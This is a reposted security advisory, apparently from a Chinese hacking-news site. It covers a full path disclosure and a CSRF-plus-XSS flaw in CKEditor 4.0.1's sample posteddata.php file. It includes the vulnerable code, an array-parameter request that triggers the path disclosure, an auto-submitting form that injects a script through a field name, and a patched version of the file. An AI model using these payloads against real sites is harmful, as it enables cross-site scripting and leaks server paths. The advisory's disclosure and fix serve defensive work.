记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

CKEditor 4.0.1 - Multiple Vulnerabilities

2013-02-21 14:15
影响程序: ckeditor 4.0.1 standard
下载地址: http://download.cksource.com/CKEditor/CKEditor/CKEditor%204.0.1/ckeditor_4.0.1_standard.zip
缺陷类型: Full Path Disclosure && XSS
===========================================
测试系统: Debian squeeze 6.0.6
服务器版本: Apache/2.2.16 (Debian)
Apache traffic server 3.2.0
MYSQL: 5.1.66-0+squeeze1
PHP 5.3.3-7+squeeze14 with Suhosin-Patch (cli) (built: Aug  6 2012 20:08:59)
Copyright (c) 1997-2009 The PHP Group
Zend Engine v2.3.0, Copyright (c) 1998-2010 Zend Technologies
with Suhosin v0.9.32.1, Copyright (c) 2007-2010, by SektionEins GmbH
===========================================
缺陷代码: /ckeditor/samples/assets/posteddata.php
=============SNIP BEGINS====================
 
root@debian:/etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets# cat posteddata.php
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
        <meta charset="utf-8">
        <title>Sample &mdash; CKEditor</title>
        <link rel="stylesheet" href="sample.css">
</head>
<body>
        <h1 class="samples">
                CKEditor &mdash; Posted Data
        </h1>
        <table border="1" cellspacing="0" id="outputSample">
                <colgroup><col width="120"></colgroup>
                <thead>
                        <tr>
                                <th>Field&nbsp;Name</th>
                                <th>Value</th>
                        </tr>
                </thead>
<?php
 
if ( isset( $_POST ) )
        $postArray = &$_POST ;                  // 4.1.0 or later, use $_POST
else
        $postArray = &$HTTP_POST_VARS ; // prior to 4.1.0, use HTTP_POST_VARS
 
foreach ( $postArray as $sForm => $value )
{
        if ( get_magic_quotes_gpc() )
                $postedValue = htmlspecialchars( stripslashes( $value ) ) ;
        else
                $postedValue = htmlspecialchars( $value ) ;
 
?>
                <tr>
                        <th style="vertical-align: top"><?php echo $sForm?></th>
                        <td><pre class="samples"><?php echo $postedValue?></pre></td>
                </tr>
        <?php
}
?>
        </table>
        <div id="footer">
                <hr>
                <p>
                        CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
                </p>
                <p id="copy">
                        Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
                </p>
        </div>
</body>
</html>
 
 
=============SNIP ENDS HERE====================
 
 
 
FULL Path Disclosure example:
 
URL: http://www.hackdig.com /admin/ckeditor/samples/sample_posteddata.php
METHOD: $_POST
 
HEADERS:
 
Host: hacker1.own
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 30
 
 
 
$_POST DATA TO SEND:
 
 
bangbangbang[]=PATH DISCLOSURE
 
 
 
 
Result:
Warning: htmlspecialchars() expects parameter 1 to be string, array given in /etc/apache2/htdocs/hacker1/admin/ckeditor/samples/assets/posteddata.php on line 38
 
Print screen: http://i076.radikal.ru/1302/84/edbe3f8f4524.png
www.hackdig.com
 
=================================================
 
CSRF+XSS
<body onload="javascript:document.forms[0].submit()">
<form name="form1" method="post" action="http://hacker1.own/admin/ckeditor/samples/sample_posteddata.php" enctype="multipart/form-data">
<input type="hidden" name="<script>alert('AkaStep');</script>" id="fupl" value="SENDF"></li>
</form>
 
=================================================
 
Print Screen:  http://i062.radikal.ru/1302/e6/25ef023dd589.png
 
 
 
=================================================
And here is fixed version:  /ckeditor/samples/assets/posteddata.php
 
================SNIP BEGINS=======================
<!DOCTYPE html>
<?php
/*
Copyright (c) 2003-2013, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.html or http://ckeditor.com/license
*/
?>
<html>
<head>
  <meta charset="utf-8">
  <title>Sample &mdash; CKEditor</title>
  <link rel="stylesheet" href="sample.css">
</head>
<body>
  <h1 class="samples">
    CKEditor &mdash; Posted Data
  </h1>
  <table border="1" cellspacing="0" id="outputSample">
    <colgroup><col width="120"></colgroup>
    <thead>
      <tr>
        <th>Field&nbsp;Name</th>
        <th>Value</th>
      </tr>
    </thead>
<?php
 
if ( isset( $_POST ) )
  $postArray = &$_POST ;      // 4.1.0 or later, use $_POST
else
  $postArray = &$HTTP_POST_VARS ;  // prior to 4.1.0, use HTTP_POST_VARS
 
foreach ( $postArray as $sForm => $value )
{
  if ( get_magic_quotes_gpc() )
    $postedValue = htmlspecialchars( stripslashes((string) $value ) ) ;
  else
  $postedValue =htmlspecialchars((string) $value ) ;
 
?>
    <tr>
      <th style="vertical-align: top"><?php echo htmlspecialchars((string)$sForm);?></th>
      <td><pre class="samples"><?php echo $postedValue?></pre></td>
    </tr>
  <?php
}
?>
  </table>
  <div id="footer">
    <hr>
    <p>
      CKEditor - The text editor for the Internet - <a class="samples" href="http://ckeditor.com/">http://ckeditor.com</a>
    </p>
    <p id="copy">
      Copyright &copy; 2003-2013, <a class="samples" href="http://cksource.com/">CKSource</a> - Frederico Knabben. All rights reserved.
    </p>
  </div>
</body>
</html> 
知识来源: www.2cto.com/Article/201302/190221.html

阅读:133767 | 评论:1 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“CKEditor 4.0.1 - Multiple Vulnerabilities”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云